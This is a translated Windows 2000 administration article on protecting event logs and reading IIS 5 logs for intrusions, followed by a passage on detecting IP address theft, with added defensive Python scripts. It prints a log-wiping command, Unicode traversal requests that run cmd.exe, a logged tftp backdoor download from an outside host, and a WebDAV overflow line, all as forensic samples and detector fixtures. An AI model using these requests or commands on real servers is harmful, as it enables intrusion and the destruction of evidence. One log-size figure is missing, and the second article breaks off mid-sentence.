Windows is favored by network administrators for its ease of use, and a considerable number of large websites in China are built on Windows 2000/XP. Because so many people use Windows, many people also study its security. Here I would like to remind network administrators that even after you have applied every security patch, nobody knows when the next vulnerability will be discovered, so you should also do a good job of protecting the system logs.
Intruders care most about the system logs, too. Once they have successfully broken into a system, the first thing they do is delete the log files so that you cannot trace their behaviour after the intrusion or check what operations they performed. Log files are as important as an airplane's "black box", because they store all the evidence of the intrusion.
Log migration and protection
Windows 2000 system logs include the application log, security log, system log, DNS service log, FTP connection log and HTTPD log. By default, the log file size is KB. The default storage locations are as follows:
Security log file: %systemroot%\system32\config\SecEvent.EVT
System log file: %systemroot%\system32\config\SysEvent.EVT
Application log file: %systemroot%\system32\config\AppEvent.EVT
FTP connection log and HTTPD transaction log: %systemroot%\system32\LogFiles, which has separate subfolders for the FTP and Web service logs; the files carry the .log suffix.
Here I refer to the log files with the default .EVT extension as event logs. I have read many articles introducing event log relocation as a way to protect them. Relocation is one protection method, but an intruder only needs to type dir c:\*.evt /s at the command line (if the system is installed on drive D, use D:) to find where the event logs are. Relocation is done by modifying the registry: find the key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Eventlog. Its Application, Security and System subkeys correspond to the "application log", "security log" and "system log" respectively. Taking the Application subkey as an example, see Figure 1.
Figure 1
The File value is the location where the application log file is stored. Change this value to the folder where we want to keep the log file, copy %systemroot%\system32\config\AppEvent.evt into that folder, and restart the machine. The purpose of this step is to take full advantage of the "Security" attribute of NTFS in Windows 2000: if the file is not moved, its security settings cannot be changed. After relocating, right-click the folder, select "Properties" and go to the "Security" tab. Clear "Allow inheritable permissions from parent to propagate to this object", add the "System" group, grant the Everyone group only "Read" permission, and give the System group "Full Control" and "Modify" permissions. Then change the default log file size to the desired size, for example 20 MB.
After the above settings are complete, even del c:\*.evt /s /q, the command-line form used to delete the log files while the system is using them, can no longer delete them.
Log file backup
WMI-based Log backup script
WMI (Windows Management Instrumentation) is a Windows system management tool provided by Microsoft; scripts developed on WMI run on Windows 2000/NT. Microsoft provides a WMI script that sets the log file size to 25 MB and lets the log automatically overwrite entries older than 14 days. (Editor's note: due to space limitations, the script is not published here. Readers who need it should get it from the Microsoft website or ask the editor for it.)
We only need to save the script as a file with the .vbs extension to use it. We can also modify the script to back up the log files. I suggest that during backup you change the .EVT suffix to another suffix (for example .c) so that the backups are harder for an attacker to find.
Backup Using dumpel
You can use dumpel.exe from the Microsoft Resource Kit tools to back up log files. Its syntax is:
dumpel -f file [-s \\server] [-l log [-m source]] [-e n1 n2 n3...] [-r] [-t] [-dx]
-s \\server: output the logs of a remote computer; omit it for the local machine.
-f filename: location and file name of the output file.
-l log: the log to dump, which can be System, Security, Application or DNS.
To dump the system log on the target server to Systemlog.log, use:
dumpel -s \\server -l system -f Systemlog.log
You can use Scheduled Tasks to back up the system logs regularly.
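The backup steps above (export the logs, give the copies a different suffix, run the job on a schedule) can be tied together with a small script that also records a hash of every copy, so that a later run can tell whether an intruder has truncated or removed a backup. The following is an added example, not a script from the article or from Microsoft; the directory paths, the .c suffix from the suggestion above and the sample file contents are constructed for a self-contained run, and on a real server the source folder would be the export location used by dumpel or the WMI script.

```python
"""Hash-checked backup of exported log files (added example, constructed paths)."""
import hashlib
import json
import os
import shutil
import tempfile
from datetime import datetime

# The article suggests hiding .EVT backups under another suffix; .c is its example.
DISGUISED_SUFFIX = ".c"


def sha256_of(path):
    """SHA-256 of a file, read in chunks so large logs do not load into memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def backup_logs(src_dir, dst_dir, suffixes=(".evt", ".log"), stamp=None):
    """Copy every log file in src_dir into dst_dir under a timestamped name with
    the disguised suffix, and write a manifest mapping backup name -> SHA-256.
    Returns the manifest dict."""
    stamp = stamp or datetime.now().strftime("%Y%m%d-%H%M%S")
    os.makedirs(dst_dir, exist_ok=True)
    manifest = {}
    for name in sorted(os.listdir(src_dir)):
        base, ext = os.path.splitext(name)
        if ext.lower() not in suffixes:
            continue
        backup_name = f"{base}-{stamp}{DISGUISED_SUFFIX}"
        target = os.path.join(dst_dir, backup_name)
        shutil.copy2(os.path.join(src_dir, name), target)
        manifest[backup_name] = sha256_of(target)
    with open(os.path.join(dst_dir, f"manifest-{stamp}.json"), "w") as f:
        json.dump(manifest, f, indent=2)
    return manifest


def verify_backups(dst_dir, manifest):
    """Re-hash every backup named in the manifest. Returns a list of problems
    (missing or modified files); an empty list means the backup set is intact."""
    problems = []
    for name, digest in manifest.items():
        path = os.path.join(dst_dir, name)
        if not os.path.exists(path):
            problems.append(f"missing: {name}")
        elif sha256_of(path) != digest:
            problems.append(f"modified: {name}")
    return problems


def demo():
    """Run on constructed files in a temp dir; returns (manifest, before, after)
    where before/after are the verification results before and after a
    simulated truncation of one backup."""
    root = tempfile.mkdtemp()
    src, dst = os.path.join(root, "logs"), os.path.join(root, "backup")
    os.makedirs(src)
    with open(os.path.join(src, "SecEvent.evt"), "wb") as f:   # constructed content
        f.write(b"constructed security log contents")
    with open(os.path.join(src, "ex030418.log"), "wb") as f:   # constructed content
        f.write(b"constructed IIS log contents")
    manifest = backup_logs(src, dst, stamp="20030418-0800")
    before = verify_backups(dst, manifest)
    # Simulate an intruder emptying one backup file after the fact.
    with open(os.path.join(dst, "SecEvent-20030418-0800.c"), "wb") as f:
        f.write(b"")
    after = verify_backups(dst, manifest)
    return manifest, before, after


if __name__ == "__main__":
    m, before, after = demo()
    print(json.dumps(m, indent=2))
    print("before tampering:", before or "intact")
    print("after tampering:", after)
```

Run backup_logs from a Scheduled Task after each dumpel export and keep the manifest on a separate machine; a non-empty result from verify_backups is the signal that the backup set itself has been touched.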
HTTPD transaction log analysis
Since Microsoft published IIS 5, many of its vulnerabilities have been exploited by attackers, such as the .ida/.idq, Unicode and WebDAVx3 holes and some unpublished ones. We back up the logs in order to analyze intrusions; the following shows the log records of successful intrusions into systems without the patches.
Unicode vulnerability intrusion log records
Open the IIS 5 Web service log file, located by default in the %systemroot%\system32\LogFiles folder. Figure 2 shows a typical log record of a Unicode vulnerability intrusion. In normal Web access, the GET command on port 80 is used to obtain Web data; with this vulnerability, however, invalid character encodings bypass the character check and obtain information that was never intended to be served. Applying the corresponding patch closes this hole.
Figure 2
For example, the following request lists a directory of the target machine:
GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 200
This access is recorded in the log as:
2003-001 08:47:47 192.168.0.1 - 192.168.0.218 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 200 -
Our log clearly shows that the attacker at 192.168.0.1 was able to view our directories. The next line records a backdoor program being transferred to our machine:
2003-001 08:47:47 192.168.0.1 - 192.168.0.218 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+tftp%20-i%2061.48.10.129%20GET%20cool.dll%20c:\httpodbc.dll 502 -
WebDAVx3 remote overflow log records
Recently the well-known WebDAVx3 vulnerability has been the most widely used in the hacker community; even systems with the latest SP3 are not spared. If a system suffers this remote overflow attack, the log looks like Figure 3.
We can see this line of information in the figure:
2003-04-18 07:20:13 192.168.0.218 - 192.168.0.218 80 LOCK /AAAAA......
It indicates that our Web service is under attack from 192.168.0.218 and that the Web service has been locked (that is, disabled). The garbled characters are the offset-guessing part of the overflow attack.
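The two kinds of record discussed above (the Unicode directory traversal with cmd.exe and tftp in the Unicode section, and the oversized LOCK request in the WebDAVx3 section) can be picked out of a backed-up IIS log automatically. The following detector is an added example written for this article, not a tool from the article or from Microsoft. It assumes the W3C extended field order visible in the quoted lines (date time c-ip cs-username s-ip s-port cs-method cs-uri-stem cs-uri-query sc-status); the sample log lines, the dates and the tftp server address 198.51.100.7 are constructed for the demo, and the 1024-byte length threshold is an assumption rather than a figure from the article.

```python
"""Flag the IIS 5 intrusion patterns described in the article (added example)."""
import re
from urllib.parse import unquote

LONG_URI = 1024   # assumed threshold for overflow-style requests
WEBDAV_METHODS = {"LOCK", "PROPFIND", "PROPPATCH", "SEARCH", "MKCOL", "COPY", "MOVE"}
# Encoded path separators used to slip past the traversal check, including the
# overlong UTF-8 forms seen in Unicode-vulnerability attacks.
ENCODED_SEP = re.compile(r"%(5c|2f|c0%af|c1%9c)", re.I)

# Constructed sample log in the field order of the lines quoted in the article.
SAMPLE_LOG = [
    "2003-04-18 08:47:40 192.168.0.1 - 192.168.0.218 80 GET /default.htm - 200",
    "2003-04-18 08:47:47 192.168.0.1 - 192.168.0.218 80 GET "
    "/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 200",
    "2003-04-18 08:47:47 192.168.0.1 - 192.168.0.218 80 GET "
    "/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe "
    r"/c+tftp%20-i%20198.51.100.7%20GET%20cool.dll%20c:\httpodbc.dll 502",
    f"2003-04-18 07:20:13 192.168.0.218 - 192.168.0.218 80 LOCK /{'A' * 2000} - 500",
]


def parse(line):
    """Split one W3C extended log line into the fields we need; None for
    directives (# lines) and short/garbled lines."""
    parts = line.split()
    if len(parts) < 10 or parts[0].startswith("#"):
        return None
    return {"date": parts[0], "time": parts[1], "client": parts[2],
            "method": parts[6], "stem": parts[7], "query": parts[8], "status": parts[9]}


def decode_fully(s, rounds=3):
    """URL-decode repeatedly (double-encoded traversal such as %255c is a known
    IIS bypass) and normalise backslashes so one check covers both separators."""
    for _ in range(rounds):
        d = unquote(s)
        if d == s:
            break
        s = d
    return s.replace("\\", "/")


def classify(rec):
    """Return the list of rule names that match one parsed record."""
    hits = []
    raw = rec["stem"] + "?" + rec["query"]
    decoded = decode_fully(raw).lower()
    if ENCODED_SEP.search(raw) or "../" in decoded:
        hits.append("directory-traversal")
    if "cmd.exe" in decoded:
        hits.append("command-execution")
    if "tftp" in decoded:
        hits.append("backdoor-upload")
    if len(rec["stem"]) > LONG_URI or (
            rec["method"] in WEBDAV_METHODS and len(rec["stem"]) > 255):
        hits.append("long-uri-overflow")
    return hits


def analyze(lines):
    """Run every rule over a list of log lines; returns one finding per
    suspicious line with its 1-based line number, client IP and rule names."""
    findings = []
    for n, line in enumerate(lines, 1):
        rec = parse(line)
        if rec is None:
            continue
        rules = classify(rec)
        if rules:
            findings.append({"line": n, "client": rec["client"],
                             "method": rec["method"], "status": rec["status"],
                             "rules": rules})
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_LOG):
        print(f"line {f['line']}: {f['client']} {f['method']} "
              f"status={f['status']} -> {', '.join(f['rules'])}")
```

Pointed at a real file, replace SAMPLE_LOG with the lines of the ex*.log file from the LogFiles folder; the traversal rule looks at both the raw and the decoded request so that an encoding the decoder does not know still triggers on the raw %5c.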
The records above give the IP addresses of the intrusions. It cannot be ruled out that such an address is only a stepping stone for the attacker; that is, it may be a "zombie" rather than the attacker's own IP address. Even so, it is still possible to trace the attacker's location by checking the other log files.
Finally, I would add that it is best to install a firewall to record and block hacker behaviour.
Keep an eye on your IP address
-- Manage switch ports to prevent IP address theft
■ Beijing Gao Xiuxia
At present IP address theft is very common. Many "attackers" use address theft to avoid tracking and hide their identity. IP address theft infringes on the rights of legitimate network users and has a serious negative impact on network security and normal network operation, so identifying effective preventive measures is an urgent issue.
Common methods of IP address theft and their prevention mechanisms
IP address theft refers to configuring a computer with an IP address that has not been authorized for it. There are two methods:
The first is simply modifying the IP address. If a user configures or changes the configuration with an IP address that was not legitimately obtained, that is IP address theft. Because the IP address is a logical protocol address, a value that must be settable and changeable at any time, there is no way to stop a user from modifying the IP address of the local machine.
The second is modifying the IP and MAC addresses at the same time. Many organizations use IP-MAC binding to solve the problem of simple IP modification, but IP-MAC binding cannot prevent users from modifying the IP-MAC pair. The MAC address is the hardware address of a network device; for Ethernet it is also called the NIC address. The MAC address of each NIC must be unique among all Ethernet devices; it is allocated by the IEEE and fixed on the NIC. However, the MAC address of some compatible NICs can be changed through their configuration program. If the IP address and MAC address of a computer are changed to those of another legitimate host, IP-MAC binding is powerless. In addition, for NICs whose MAC address cannot be modified directly, the MAC address can still be changed in software, that is, by modifying the lower-layer network software to spoof the upper-layer software.
At present the commonly used method of detecting IP address theft is to regularly scan the ARP (Address Resolution Protocol) table of the network's routers, obtain the current IP-MAC mapping, and compare it with the table of valid IP addresses and their registered IP-MAC pairs; an inconsistency indicates unauthorized access. IP address theft can also be detected from user fault reports (a MAC address conflict message appears when an IP address is being stolen). On this basis, the common prevention mechanisms are IP-MAC binding, proxy server technology, IP-MAC-USER authentication and authorization, and transparent gateway technology.
These mechanisms have limitations: with IP-MAC binding, user management is very difficult; transparent gateway technology requires a dedicated machine for data forwarding, which easily becomes a bottleneck. More importantly, these mechanisms do not completely prevent the damage caused by IP address theft; they only stop a stolen address from directly reaching external network resources. In fact, because the address thief still has complete freedom of action within the IP subnet, on the one hand this interferes with legitimate users, and on the other hand attackers may exploit it to attack other machines and network devices in the subnet. If a proxy server exists in the subnet, the thief can also obtain outside resources through it by various means.
Using port location to block IP address theft
A switch is the main network device of a LAN. It works at the data link layer and forwards and filters frames based on MAC addresses, so each switch maintains a table mapping MAC addresses to ports. The MAC address of any host directly connected to the switch or in the same broadcast domain is stored in the switch's MAC address table. An SNMP (Simple Network Management Protocol) management station can communicate with the SNMP agent on each switch to obtain the port-to-MAC table it holds, and from these form a real-time Switch-Port-MAC table. Will be obtained in real time
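The ARP-table comparison described in the previous section and the Switch-Port-MAC table described here fit together: the comparison says which IP is in the wrong hands, and the port table says which switch port the offending MAC sits on, which is what a port-blocking response needs. It also covers the case the previous section calls powerless for IP-MAC binding, a cloned IP-MAC pair: the ARP table then looks clean, but the same MAC shows up on two ports. The following is an added example, not code from the article; the ARP snapshot, the authorized IP-MAC table and the Switch-Port-MAC table are constructed by hand for the demo rather than collected over SNMP, and the switch and port names are invented.

```python
"""Locate IP address theft from an ARP snapshot and a Switch-Port-MAC table
(added example, all data constructed)."""

# "ip mac" lines as a collector might pull from a router's ARP table (constructed).
ARP_SNAPSHOT = """\
192.168.1.10 00:11:22:33:44:01
192.168.1.11 00:11:22:33:44:02
192.168.1.12 00-11-22-33-44-99
192.168.1.50 00:11:22:33:44:50
"""

# Registered (valid IP, MAC) pairs for the subnet (constructed).
AUTHORIZED = {
    "192.168.1.10": "00:11:22:33:44:01",
    "192.168.1.11": "00:11:22:33:44:02",
    "192.168.1.12": "00:11:22:33:44:03",
}

# Switch-Port-MAC table as the article describes building over SNMP; here
# constructed. Note 00:11:22:33:44:02 appears on two ports: a cloned IP-MAC pair.
SWITCH_PORT_MAC = {
    ("sw-1", "Fa0/1"): {"00:11:22:33:44:01"},
    ("sw-1", "Fa0/2"): {"00:11:22:33:44:02"},
    ("sw-2", "Fa0/7"): {"00:11:22:33:44:99", "00:11:22:33:44:50"},
    ("sw-2", "Fa0/9"): {"00:11:22:33:44:02"},
}


def normalize_mac(mac):
    """Accept 00-11-... and 00:11:... forms, compare in one canonical form."""
    return mac.lower().replace("-", ":")


def parse_arp(text):
    """Turn 'ip mac' lines into an {ip: mac} dict, ignoring blank/short lines."""
    table = {}
    for line in text.splitlines():
        parts = line.split()
        if len(parts) >= 2:
            table[parts[0]] = normalize_mac(parts[1])
    return table


def locate_port(mac, port_table):
    """Return every (switch, port) on which a MAC is seen, in table order."""
    return [sp for sp, macs in port_table.items() if mac in macs]


def find_theft(arp, authorized, port_table):
    """Compare the live ARP table with the authorized IP-MAC table. Each finding
    carries the kind of mismatch and the port(s) where the offending MAC sits."""
    findings = []
    for ip, mac in sorted(arp.items()):
        expected = authorized.get(ip)
        if expected is None:
            kind = "unassigned-ip"        # IP not issued to anyone
        elif normalize_mac(expected) != mac:
            kind = "mac-mismatch"         # IP issued, but used from another NIC
        else:
            continue
        findings.append({"ip": ip, "mac": mac, "expected": expected,
                         "kind": kind, "ports": locate_port(mac, port_table)})
    return findings


def cloned_macs(port_table):
    """MACs seen on more than one switch port: the signature of a copied IP-MAC
    pair that ARP comparison alone cannot see."""
    seen = {}
    for sp, macs in port_table.items():
        for mac in macs:
            seen.setdefault(mac, []).append(sp)
    return {mac: ports for mac, ports in seen.items() if len(ports) > 1}


if __name__ == "__main__":
    for f in find_theft(parse_arp(ARP_SNAPSHOT), AUTHORIZED, SWITCH_PORT_MAC):
        print(f"{f['kind']}: {f['ip']} from {f['mac']} "
              f"(registered {f['expected']}) on {f['ports']}")
    for mac, ports in cloned_macs(SWITCH_PORT_MAC).items():
        print(f"cloned-mac: {mac} seen on {ports}")
```

In a real deployment parse_arp would be fed by the router poll and SWITCH_PORT_MAC by the SNMP walk of each switch; the output of find_theft and cloned_macs is then the list of ports to disable, and the MAC on each finding identifies which of two ports carrying the same MAC is the legitimate one by comparing against where that MAC was seen in earlier polls.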